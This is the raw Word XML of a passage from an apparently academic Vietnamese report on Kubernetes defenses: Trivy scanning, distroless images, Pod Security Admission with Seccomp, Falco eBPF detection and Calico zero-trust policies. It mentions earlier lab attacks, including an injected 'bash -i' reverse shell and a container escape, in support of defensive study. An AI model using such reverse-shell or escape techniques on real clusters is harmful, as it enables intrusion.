        <w:t>Về mặt kiến trúc, eBPF cho phép thực thi các chương trình giám sát dạng hộp cát trực tiếp bên trong không gian nhân Linux (Kernel Space) mà không cần phải biên dịch lại kernel hay tải các kernel modules nguy hiểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63304933" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="listnor"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cơ chế hoạt động:</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khi một container (ví dụ: web-frontend) gọi một syscall (như execve để khởi chạy bash shell), eBPF program đã được gắn (hook) tại các điểm kiểm soát (kprobes/tracepoints) sẽ lập tức bắt chặn sự kiện này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7516EC" w14:textId="005F9D72" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="listnor"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>An toàn và Hiệu năng:</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mã eBPF trước khi chạy phải vượt qua bộ kiểm duyệt (eBPF Verifier) của nhân Linux để đảm bảo không gây crash hệ thống, sau đó được biên dịch Just-In-Time (JIT) ra mã máy nguyên thủy, mang lại tốc độ thực thi gần như tức thời (overhead chỉ tính bằng micro-giây).</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          </w:rPr>
          <w:id w:val="1774667183"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="0056158A">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0056158A" w:rsidRPr="0056158A">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Sha22 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="0056158A">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="0056158A" w:rsidRPr="0056158A">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="0056158A" w:rsidRPr="0056158A">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[19]</w:t>
          </w:r>
          <w:r w:rsidR="0056158A">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="7CFD3D10" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc235976367"/>
      <w:r w:rsidRPr="009823E1">
        <w:t>Giải pháp công nghệ giai đoạn Tích hợp và Phân phối (Build &amp; Ship)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="1A1C8D25" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Trivy, được phát triển bởi Aqua Security, là một công cụ rà quét lỗ hổng bảo mật mã nguồn mở hàng đầu, được thiết kế chuyên biệt cho môi trường Container và Cloud-Native. Điểm mạnh cốt lõi của Trivy nằm ở khả năng phân tích toàn diện đa tầng, từ việc phát hiện các lỗ hổng đã biết (CVE) trong các gói hệ điều hành (OS packages) và thư viện phụ thuộc của ứng dụng (Application dependencies), cho đến việc nhận diện các sai sót trong cấu hình hạ tầng (Misconfigurations) và rò rỉ thông tin nhạy cảm (Secrets). Nhờ kiến trúc vận hành siêu nhẹ, không yêu cầu lưu trữ trạng thái (stateless) và có tốc độ quét vượt trội, Trivy cực kỳ lý tưởng để tích hợp tự động vào các đường ống CI/CD. Trong kiến trúc phòng thủ đa lớp, công cụ này đóng vai trò là chốt chặn an ninh đầu tiên, đảm bảo mọi cấu phần phần mềm đều được làm sạch trước khi đóng gói và phân phối vào môi trường thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F8182" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Để loại bỏ lỗ hổng từ các gói phụ thuộc (như thư viện dính Command Injection), đề án tích hợp công cụ rà quét Trivy vào quy trình CI/CD. Về mặt kiến trúc Image, đề án sử dụng kỹ thuật đóng gói đa giai đoạn (Multi-stage build) và sử dụng ảnh nền tối giản (Distroless Images).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8337D" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ảnh Distroless loại bỏ hoàn toàn các tiện ích hệ điều hành cơ bản như trình quản lý gói (apt/yum), và đặc biệt là không chứa trình thông dịch shell (sh/bash). Do đó, </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ngay cả khi ứng dụng Web dính lỗi Command Injection (như TN-01), hacker tiêm lệnh bash -i cũng sẽ thất bại vì tệp thực thi bash hoàn toàn không tồn tại trong bộ nhớ container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC2564" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51EEE607" wp14:editId="54FB701C">
            <wp:extent cx="4752179" cy="2545308"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1135770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70871" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4767808" cy="2553679"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12934539" w14:textId="46BFBC4F" w:rsidR="00204C0D" w:rsidRPr="00FB4AA9" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc236001525"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</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w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Cấu hình an toàn cho Dockerfile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="36D351A8" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00212603" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc235976368"/>
      <w:r w:rsidRPr="00212603">
        <w:t>Giải pháp công nghệ phòng thủ chủ động tầng Thực thi (Runtime)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="63F06B7A" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r>
        <w:t>Đây là cấu phần kỹ thuật trọng tâm, sử dụng các công nghệ can thiệp sâu vào luồng xử lý của Kubernetes API và Linux Kernel để bẻ gãy chuỗi tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1958122C" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00D94C11" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r w:rsidRPr="00D94C11">
        <w:t xml:space="preserve">Để ngăn chặn cấu hình` sai lầm trong TN-01 (cấp quyền </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:t xml:space="preserve"> và mount ổ đĩa </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:t>), hệ thống triển khai cơ chế Pod Security Admission (PSA) tích hợp sẵn trong API Server của Kubernetes. Khi một bản ghi (Manifest) yêu cầu tạo Pod gửi đến, bộ điều khiển Mutating/Validating Webhook sẽ can thiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDD635" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00D94C11" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đề án áp dụng cấu hình PSA cấp độ Restricted. Dưới cấp độ này, API Server bắt buộc mọi Container phải kích hoạt hồ sơ bộ lọc hệ thống Seccomp (Secure Computing Mode) ở trạng thái </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>RuntimeDefault</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Seccomp hoạt động bằng cách chèn một bộ lọc BPF (Berkeley Packet Filter) vào tiến trình của container, trực tiếp từ chối (trả về mã lỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>EPERM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) khoảng 44 Syscalls nguy hiểm (như </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>umount2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ptrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>unshare</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CFA03F" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D08CCA5" wp14:editId="659FB40D">
            <wp:extent cx="4930652" cy="2190466"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
            <wp:docPr id="43189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99746" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4935819" cy="2192761"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6343676D" w14:textId="4E29B006" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc236001526"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</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2</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>. Cấu hình pod an toàn áp dụng cấu hình PSA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="2BE3B8EF" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r w:rsidRPr="00D94C11">
        <w:t>Khi cấu hình này được áp dụng, kỹ thuật Container Escape trong bài TN-01 sẽ bị vô hiệu hóa hoàn toàn ngay, do hệ điều hành vật lý từ chối cấp phát không gian bộ nhớ cho các Syscalls can thiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A77B9" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc235976369"/>
      <w:r>
        <w:t>Giám sát hành vi độ trễ cực thấp với Falco (Động cơ eBPF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="100FD851" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00D94C11" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r w:rsidRPr="00D94C11">
        <w:t xml:space="preserve">Dù đã phòng thủ tĩnh, hệ thống vẫn cần giải pháp phát hiện thời gian thực (Threat Detection) để </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">chặn </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:t>bắt hành vi khai thác. Đề án triển khai Falco –</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:t xml:space="preserve">ban đầu được phát triển bởi Sysdig và hiện là dự án cấp cao nhất (Graduated Project) thuộc Tổ chức Điện toán Đám mây Nguyên bản (CNCF), được giới chuyên môn công nhận là tiêu chuẩn thực tế (de facto standard) cho công tác phát hiện mối đe dọa tại tầng thực thi (Runtime Threat Detection) trong môi trường Kubernetes. Sức mạnh cốt lõi của Falco nằm ở việc khai thác công nghệ eBPF (Extended Berkeley Packet Filter), cho phép triển khai các đầu dò (probes) giám sát trực tiếp vào không gian nhân Linux (Kernel Space) một cách an toàn, cô lập và hoàn toàn trong suốt với các container ứng dụng. Khác với các giải pháp bảo mật tĩnh, Falco hoạt động như một "camera an ninh tàng hình", liên tục thu thập, phân tích các lời gọi hệ thống (Syscalls) và luồng sự kiện mạng theo thời gian thực, đối chiếu chúng với một công cụ quy tắc (Rules Engine) linh hoạt. Trong kiến trúc phòng thủ đa lớp, Falco đóng vai trò là chốt chặn chiều sâu cuối cùng, nhận diện tức thời các hành vi xâm nhập tinh vi như khởi tạo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94C11">
        <w:lastRenderedPageBreak/>
        <w:t>shell trái phép (Reverse Shell), đọc/ghi tệp tin nhạy cảm hay nỗ lực leo thang đặc quyền – những rủi ro zero-day nguy hiểm mà các rào cản bảo mật tĩnh thường bỏ lọt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA4250" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r>
        <w:t xml:space="preserve">Falco triển khai một module eBPF trực tiếp vào nhân Linux của máy Worker. Khi tin tặc lợi dụng lỗ hổng Web để kích hoạt Reverse Shell (như quá trình TN-01, TN-02), tiến trình này buộc phải thực hiện Syscall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t>. eBPF hook sẽ chụp lại các đối số của syscall (tham số lệnh bash, đường dẫn mạng TCP), đẩy lên không gian người dùng (User Space) để Falco đối chiếu với bộ luật định sẵn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FEDB52" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006F4E96">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ACB35F5" wp14:editId="20E1CCAD">
            <wp:extent cx="4679950" cy="1296969"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="408193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93896" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4696213" cy="1301476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27308D9E" w14:textId="42BFB5E6" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc236001527"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</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3</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>. Cấu hình rule phát hiện sử dụng cho giải pháp Falco</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="0CB59C0D" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc235976370"/>
      <w:r w:rsidRPr="009823E1">
        <w:t>Vi phân mảnh mạng với Calico CNI (Chống kịch bản TN-03)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="2E30544C" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r w:rsidRPr="009823E1">
        <w:t>Để giải quyết bài toán mạng phẳng mặc định (Flannel) cho phép tự do nghe lén trong kịch bản TN-03, đề án thay thế lớp mạng bằng Calico CNI. Calico không sử dụng cầu nối mạng ảo (virtual bridge) mà định tuyến trực tiếp dựa trên giao thức BGP (Border Gateway Protocol) kết hợp thao tác trực tiếp trên nhân iptables hoặc eBPF datapath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1EBC95" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r w:rsidRPr="009823E1">
        <w:t>Đề án thiết lập kiến trúc Zero-Trust Network, mặc định từ chối (Deny-All) toàn bộ lưu lượng trong Cluster, sau đó chỉ mở các khe hẹp (Allow-List) cho các dịch vụ được cấp phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293552DB" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006F4E96">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1175C611" wp14:editId="6E3C3D02">
            <wp:extent cx="4838131" cy="2112485"/>
            <wp:effectExtent l="0" t="0" r="635" b="2540"/>
            <wp:docPr id="2019123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23056" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4840228" cy="2113401"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB87445" w14:textId="72B49B2C" w:rsidR="00204C0D" w:rsidRPr="00FB4AA9" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc236001528"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</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4</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Cấu hình Network Policy đảm bảo kiến trúc Zero-Trust Network</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
